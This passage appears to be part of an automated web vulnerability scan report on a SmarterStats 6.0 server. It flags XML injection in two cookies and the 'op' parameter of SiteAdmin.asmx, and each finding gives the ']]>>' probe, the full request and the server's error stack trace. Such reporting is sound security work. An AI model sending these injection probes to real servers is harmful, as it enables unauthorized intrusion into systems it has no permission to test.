&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteInfo&gt;
&lt;/Sites&gt;
&lt;/GetAllSitesResult&gt;
&lt;/GetAllSitesResponse&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>
</span>

<span>
<h3>HTTP GET</h3>
<p>The following is a sample HTTP GET request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>GET /Services/SiteAdmin.asmx/GetAllSites?<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>IncludeDetails</font>=<font class=value>string</font> HTTP/1.1
Host: localhost
</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;SiteInfoArrayResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Sites&gt;
&lt;SiteInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteInfo&gt;
&lt;SiteInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteInfo&gt;
&lt;/Sites&gt;
&lt;/SiteInfoArrayResult&gt;</pre>
</span>

<span>
<h3>HTTP POST</h3>
<p>The following is a sample HTTP POST request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx/GetAllSites HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: <font class=value>length</font>

<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>IncludeDetails</font>=<font class=value>string</font></pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;SiteInfoArrayResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Sites&gt;
&lt;SiteInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteInfo&gt;
&lt;SiteInfo&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/SiteInfo&gt;
&lt;/Sites&gt;
&lt;/SiteInfoArrayResult&gt;</pre>
</span>

</span>









</body>
</html>

3.17. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [STTTState cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The STTTState cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the STTTState cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /Services/SiteAdmin.asmx HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/
Cookie: SelectedLanguage=; STTTState=]]>>; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:00:59 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7512
Connection: Close

<html>
<head>
<title>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Xml.Schema.XmlSchemaException: Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[XmlSchemaException: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.]
System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e) +26
System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType) +540
System.Xml.Schema.Compiler.Compile() +772
System.Xml.Schema.XmlSchemaSet.Compile() +742
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +1109
System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas) +204
System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +190
System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +75
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25
System.Web.UI.Control.LoadRecursive() +95
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2760
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[XmlSchemaException]: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.
at System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e)
at System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType)
at System.Xml.Schema.Compiler.Compile()
at System.Xml.Schema.XmlSchemaSet.Compile()
at System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile)
at System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas)
at System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.Services.Protocols.DocumentationServerProtocol.WriteReturns(Object[] returnValues, Stream outputStream)
[InvalidOperationException]: The XML Web service help page encountered an internal error.
at System.Web.Services.Protocols.WebServiceHandler.WriteException(Exception e)
at System.Web.Services.Protocols.WebServiceHandler.CoreProcessRequest()
at System.Web.Services.Protocols.SyncSessionlessHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
-->

3.18. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [loginsettings cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The loginsettings cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the loginsettings cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /Services/SiteAdmin.asmx HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=]]>>;

Response

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:01:23 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7512
Connection: Close

<html>
<head>
<title>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Xml.Schema.XmlSchemaException: Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[XmlSchemaException: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.]
System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e) +26
System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType) +540
System.Xml.Schema.Compiler.Compile() +772
System.Xml.Schema.XmlSchemaSet.Compile() +742
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +1109
System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas) +204
System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +190
System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +75
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25
System.Web.UI.Control.LoadRecursive() +95
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2760
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[XmlSchemaException]: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.
at System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e)
at System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType)
at System.Xml.Schema.Compiler.Compile()
at System.Xml.Schema.XmlSchemaSet.Compile()
at System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile)
at System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas)
at System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.Services.Protocols.DocumentationServerProtocol.WriteReturns(Object[] returnValues, Stream outputStream)
[InvalidOperationException]: The XML Web service help page encountered an internal error.
at System.Web.Services.Protocols.WebServiceHandler.WriteException(Exception e)
at System.Web.Services.Protocols.WebServiceHandler.CoreProcessRequest()
at System.Web.Services.Protocols.SyncSessionlessHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
-->

3.19. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [op parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The op parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the op parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /Services/SiteAdmin.asmx?op=MoveSite]]>> HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:02:06 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7512
Connection: Close

<html>
<head>
<title>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Xml.Schema.XmlSchemaException: Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

